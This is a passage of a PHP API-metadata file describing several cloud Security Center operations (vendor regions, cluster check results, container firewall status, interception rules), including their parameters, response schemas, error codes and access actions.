'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 54,\\n \\"Count\\": 10\\n },\\n \\"CloudAssetSchemas\\": [\\n {\\n \\"DataName\\": \\"ACS_ECS_Disk\\",\\n \\"Vendor\\": 0,\\n \\"AssetType\\": 0,\\n \\"AssetSubType\\": 1,\\n \\"Properties\\": \\"[{\\\\\\\\\\\\\\"associatedData\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"assetSubType\\\\\\\\\\\\\\":100,\\\\\\\\\\\\\\"assetType\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"dataName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"ACS_ECS_Instance\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"properties\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"InstanceId\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"path\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"InstanceId\\\\\\\\\\\\\\"}],\\\\\\\\\\\\\\"vendor\\\\\\\\\\\\\\":0}],\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"The ID of the instance to which the disk is attached.\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"i-bp67acfmxazb4q****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"InstanceId\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"withAssociatedData\\\\\\\\\\\\\\":true},{\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Disk name\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"testDiskName\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"DiskName\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Only encrypted disks\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"false\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Encrypted\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"BOOLEAN\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Disk status\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"In_use\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Status\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Disk category\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"cloud_ssd\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Category\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Disk type\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"system\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Type\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Specifies whether to set an automatic snapshot policy for the disk.\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"false\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"EnableAutomatedSnapshotPolicy\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"BOOLEAN\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"The ID of the automatic snapshot policy.\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"sp-bp67acfmxazb4p****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"AutoSnapshotPolicyId\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\"},{\\\\\\\\\\\\\\"description\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"Disk, local disk, or elastic ephemeral disk ID\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"example\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"d-bp18um4r4f2fve24****\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"DiskId\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\"}]\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'Get the list of asset structure definitions.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCloudAssetSchemas'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCloudAssetSchemas', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListCloudVendorRegions' => [ 'summary' => 'Queries the synchronization region configurations of other clouds on a site.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '135132', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The service provider of cloud assets. Valid values:'."\n" ."\n" .'* **Tencent**, **HUAWEICLOUD**, **Azure**, and **AWS**: other service providers of cloud assets.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Tencent', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The regions that the service provider supports.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region ID.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Area' => ['title' => '', 'description' => 'The area to which the region belongs. The valid values vary based on the value of the Vendor parameter.'."\n" ."\n" .'* Valid values if **Vendor** is set to Tencent:'."\n" .'* **cn**: China'."\n" .'* **southeast_asia**: Southeast Asia Pacific'."\n" .'* **northeast_asia**: Northeast Asia Pacific'."\n" .'* **southern_asia**: South Asia Pacific'."\n" .'* **north_America**: North America'."\n" .'* **south_America**: South America'."\n" .'* **western_America**: Western United States'."\n" .'* **eastern_America**: Eastern United States'."\n" .'* **european**: Europe'."\n" .'* Valid values if **Vendor** is set to HUAWEICLOUD:'."\n" .'* **cn**: China'."\n" .'* **africa**: Africa'."\n" .'* **latin_america**: Latin America'."\n" .'* **asia**: Asia Pacific'."\n" .'* Valid values if **Vendor** is set to Azure:'."\n" .'* **middle_east**: Middle East'."\n" .'* **south_america**: South America'."\n" .'* **canada**: Canada'."\n" .'* **asia-pacific**: Asia Pacific'."\n" .'* **europe**: Europe'."\n" .'* **africa**: Africa'."\n" .'* **us**: United States'."\n" .'* **other**: other regions'."\n" .'* Valid values if **Vendor** is set to AWS:'."\n" .'* **cn**: China'."\n" .'* **us**: United States'."\n" .'* **eu**: Europe'."\n" .'* **asia**: Asia Pacific'."\n" .'* **south_america**: South America'."\n" .'* **me**: Middle East'."\n" .'* **ca**: Canada'."\n" .'* **af**: Africa'."\n", 'type' => 'string', 'example' => 'cn'], 'Disable' => ['title' => '', 'description' => 'Indicates whether the region is configured as a synchronization region on another site. Valid values:'."\n" ."\n" .'* **0**: The region is not configured as a synchronization region on another site.'."\n" .'* **1**: The region is configured as a synchronization region on another site.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'Selected' => ['title' => '', 'description' => 'Indicates whether the region is configured as a synchronization region on this site. Valid values:'."\n" ."\n" .'* **0**: The region is not configured as a synchronization region on this site.'."\n" .'* **1**: The region is configured as a synchronization region on this site.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The total number of returned entries.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The return code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'C87EC6AD-4590-5546-9DF6-B8956579D***', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => '-100', 'errorMessage' => 'The service is unavailable, please try again later.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Area\\": \\"cn\\",\\n \\"Disable\\": 1,\\n \\"Selected\\": 0\\n }\\n ],\\n \\"Count\\": 2,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"C87EC6AD-4590-5546-9DF6-B8956579D***\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'ListCloudVendorRegions', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCloudVendorRegions'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCloudVendorRegions', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListClusterCheckResult' => [ 'summary' => 'Query Cluster Check Item Scan Results', 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'Cluster ID.', 'type' => 'string', 'required' => true, 'example' => 'c3aaf6c8085f84791882eef200cd2****', 'title' => ''], ], [ 'name' => 'Statuses', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of check item statuses.', 'type' => 'array', 'items' => ['description' => 'Status of the check item. Values:'."\n" ."\n" .'- **PASS**: Passed'."\n" ."\n" .'- **NOT\\_PASS**: Not passed'."\n" ."\n" .'- **CHECKING**: Checking'."\n" ."\n" .'- **NOT\\_CHECK**: Not checked'."\n" ."\n" .'- **WHITELIST**: Whitelisted', 'type' => 'string', 'required' => false, 'example' => 'PASS', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'RiskLevels', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of risk levels.', 'type' => 'array', 'items' => ['description' => 'Risk level of the check item. Values:'."\n" ."\n" .'- **HIGH**: High risk'."\n" ."\n" .'- **MEDIUM**: Medium risk'."\n" ."\n" .'- **LOW**: Low risk', 'type' => 'string', 'required' => false, 'example' => 'high,medium', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Number of records to display per page when performing a paginated query. The default value is **20**, indicating 20 records per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'Page number for the current page in a paginated query. The default value is **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Language type for requests and responses. The default value is **zh**. Values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => true, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CheckKey', 'in' => 'query', 'schema' => ['description' => 'Fuzzy search key for check items.', 'type' => 'string', 'required' => false, 'example' => 'container', 'title' => ''], ], [ 'name' => 'SortType', 'in' => 'query', 'schema' => ['description' => 'Custom sorting type. Values:'."\n" ."\n" .'- **RISK\\_LEVEL**: Risk level.'."\n" ."\n" .'- **STATUS**: Check item status.', 'type' => 'string', 'required' => false, 'example' => 'STATUS', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'Checks' => [ 'description' => 'Information on check results.', 'type' => 'array', 'items' => [ 'description' => 'Information on check results.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '5', 'title' => ''], 'CheckType' => ['description' => 'Source type of the security check item:'."\n" ."\n" .'- **CUSTOM**:User-defined'."\n" ."\n" .'- **SYSTEM**:Predefined by the Security Platform', 'type' => 'string', 'example' => 'SYSTEM', 'title' => ''], 'CheckShowName' => ['description' => 'Name of the check item.', 'type' => 'string', 'example' => 'OSS-PublicReadOpenManifestFileWithoutEncryption', 'title' => ''], 'CheckPolicies' => [ 'description' => 'Information about the standards, requirements, and sections associated with the check result.', 'type' => 'array', 'items' => [ 'description' => 'Information about the standards, requirements, and sections associated with the check result.', 'type' => 'object', 'properties' => [ 'StandardId' => ['description' => 'Standard ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'StandardShowName' => ['description' => 'Display name of the standard for the check item.', 'type' => 'string', 'example' => 'Best security practices', 'title' => ''], 'RequirementId' => ['description' => 'Requirement ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], 'RequirementShowName' => ['description' => 'Display name of the requirement for the check item.', 'type' => 'string', 'example' => 'Alibaba cloud OSS best security practices', 'title' => ''], 'SectionId' => ['description' => 'Section ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'SectionShowName' => ['description' => 'Display name of the section for the check item.', 'type' => 'string', 'example' => 'Log Audit', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'InstanceType' => ['description' => 'Asset type of the cloud product.', 'type' => 'string', 'example' => 'Workload', 'title' => ''], 'InstanceSubType' => ['description' => 'Subtype of the cloud product asset. Values:'."\n" ."\n" .'- When **InstanceType** is **ECS**, this parameter can take the following values:'."\n" ."\n" .' - **INSTANCE**'."\n" ."\n" .' - **DISK**'."\n" ."\n" .' - **SECURITY\\_GROUP**'."\n" ."\n" .'- When **InstanceType** is **ACR**, this parameter can take the following values:'."\n" ."\n" .' - **REPOSITORY\\_ENTERPRISE**'."\n" ."\n" .' - **REPOSITORY\\_PERSON**'."\n" ."\n" .'- When **InstanceType** is **RAM**, this parameter can take the following values:'."\n" ."\n" .' - **ALIAS**'."\n" ."\n" .' - **USER**'."\n" ."\n" .' - **POLICY**'."\n" ."\n" .' - **GROUP**'."\n" ."\n" .'- When **InstanceType** is **WAF**, this parameter can take the following values:'."\n" ."\n" .' - **DOMAIN**'."\n" ."\n" .'- For other **InstanceType** values, this parameter can take the following value:'."\n" ."\n" .' - **INSTANCE**', 'type' => 'string', 'example' => 'DISK', 'title' => ''], 'AssetType' => ['description' => 'Asset type.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'Subtype of the cloud product.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Status' => ['description' => 'Status of the check item. Values:'."\n" ."\n" .'- **PASS**: Passed'."\n" ."\n" .'- **NOT\\_PASS**: Not passed'."\n" ."\n" .'- **CHECKING**: Checking'."\n" ."\n" .'- **NOT\\_CHECK**: Not checked'."\n" ."\n" .'- **WHITELIST**: Whitelisted', 'type' => 'string', 'example' => 'PASS', 'title' => ''], 'RiskLevel' => ['description' => 'Risk level of the check item. Possible values:'."\n" ."\n" .'- **HIGH**:High'."\n" ."\n" .'- **MEDIUM**:Medium'."\n" ."\n" .'- **LOW**:Low', 'type' => 'string', 'example' => 'HIGH', 'title' => ''], 'LastCheckTime' => ['description' => 'Timestamp of the latest check, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1657793398000', 'title' => ''], 'Vendor' => ['description' => 'Vendor of the asset. Values:'."\n" ."\n" .'0: Alibaba Cloud 3: Other cloud 4: Other cloud 5: Other cloud 7: Other cloud', 'type' => 'string', 'example' => '0', 'title' => ''], 'TrialPermission' => ['description' => 'Whether the check depends on TRIAL permissions.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'TrialPermissionType' => ['description' => 'Whether the check item requires enabling data delivery of operation audit for more than 30 days to build a behavior baseline.'."\n" ."\n" .'- **1**:Required'."\n" ."\n" .'- **0**:Not Required', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'Pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'Page number in the pagination query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'Number of items per page in the pagination query. The default value is **20**, indicating that 20 items are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of data entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '83', 'title' => ''], 'Count' => ['description' => 'The number of data entries displayed on the current page during pagination.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the current request.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Checks\\": [\\n {\\n \\"CheckId\\": 5,\\n \\"CheckType\\": \\"SYSTEM\\",\\n \\"CheckShowName\\": \\"OSS-PublicReadOpenManifestFileWithoutEncryption\\",\\n \\"CheckPolicies\\": [\\n {\\n \\"StandardId\\": 1,\\n \\"StandardShowName\\": \\"Best security practices\\",\\n \\"RequirementId\\": 2,\\n \\"RequirementShowName\\": \\"Alibaba cloud OSS best security practices\\",\\n \\"SectionId\\": 3,\\n \\"SectionShowName\\": \\"Log Audit\\"\\n }\\n ],\\n \\"InstanceType\\": \\"Workload\\",\\n \\"InstanceSubType\\": \\"DISK\\",\\n \\"AssetType\\": 0,\\n \\"AssetSubType\\": 0,\\n \\"Status\\": \\"PASS\\",\\n \\"RiskLevel\\": \\"HIGH\\",\\n \\"LastCheckTime\\": 1657793398000,\\n \\"Vendor\\": \\"0\\",\\n \\"TrialPermission\\": true,\\n \\"TrialPermissionType\\": 1\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 83,\\n \\"Count\\": 20\\n },\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\"\\n}","type":"json"}]', 'title' => 'Query Cluster Check Item Scan Results', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListClusterCheckResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListClusterCnnfStatusDetail' => [ 'summary' => 'Queries the status details of the container firewall.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of cluster IDs.', 'type' => 'array', 'items' => ['description' => 'The cluster ID.'."\n" .'>You can call the [DescribeContainerInstances](~~DescribeContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c8dc3a999320948a5b9857d220917****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request. The China Chinese Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '64329F40-5C94-51D3-A400-37AA7BAC****'], 'Data' => [ 'description' => 'The list of container firewall statuses.', 'type' => 'array', 'items' => [ 'description' => 'The details of the container firewall status.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c8ca91e0907d94efaba7fb0827eb9****', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-bp180bogui4fc0z4****', 'title' => ''], 'MachineName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'security', 'title' => ''], 'PluginName' => ['description' => 'The name of the plug-in type. The value is fixed as **alinet**.', 'type' => 'string', 'example' => 'alinet', 'title' => ''], 'Installed' => ['description' => 'Indicates whether the container firewall plug-in is installed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Status' => ['description' => 'The online status of the plug-in. Valid values:'."\n" .'- **false**: offline'."\n" .'- **true**: online.', 'type' => 'string', 'example' => 'false', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the associated instance.', 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the associated instance.', 'type' => 'string', 'example' => '10.42.XX.XX', 'title' => ''], 'MachineType' => ['description' => 'The type of the instance. The value is fixed as **ecs**.', 'type' => 'integer', 'format' => 'int32', 'example' => 'ecs', 'title' => ''], 'PluginVersion' => ['description' => 'The version of the plug-in.', 'type' => 'string', 'example' => '3.3', 'title' => ''], 'InvalidType' => ['description' => 'The invalid type of the plug-in. Valid values:'."\n" .'- **PLUGIN_OFFLINE**: offline'."\n" .'- **PLUGIN\\_NOT\\_INSTALLED**: not installed'."\n" .'- **PLUGIN\\_INVALID\\_VERSION**: invalid version.', 'type' => 'string', 'example' => 'PLUGIN_OFFLINE', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query container firewall status details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClusterCnnfStatusDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListClusterCnnfStatusDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"64329F40-5C94-51D3-A400-37AA7BAC****\\",\\n \\"Data\\": [\\n {\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"ClusterId\\": \\"c8ca91e0907d94efaba7fb0827eb9****\\",\\n \\"InstanceId\\": \\"i-bp180bogui4fc0z4****\\",\\n \\"MachineName\\": \\"security\\",\\n \\"PluginName\\": \\"alinet\\",\\n \\"Installed\\": true,\\n \\"Status\\": \\"false\\",\\n \\"InternetIp\\": \\"172.16.XX.XX\\",\\n \\"IntranetIp\\": \\"10.42.XX.XX\\",\\n \\"MachineType\\": 0,\\n \\"PluginVersion\\": \\"3.3\\",\\n \\"InvalidType\\": \\"PLUGIN_OFFLINE\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListClusterInterceptionConfig' => [ 'summary' => 'Queries the list of cluster interception rules.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterCNNFStatus', 'in' => 'query', 'schema' => ['description' => 'The container firewall status of the cluster. Valid values:'."\n" .'- **-1**: unknown'."\n" .'- **0**: abnormal'."\n" .'- **1**: normal'."\n" .'- **2**: normal pending confirmation.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The cluster name.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: 1, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" .'>You can call the [DescribeContainerInstances](~~DescribeContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c22143730ab6e40b09ec7c1c51d4d****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 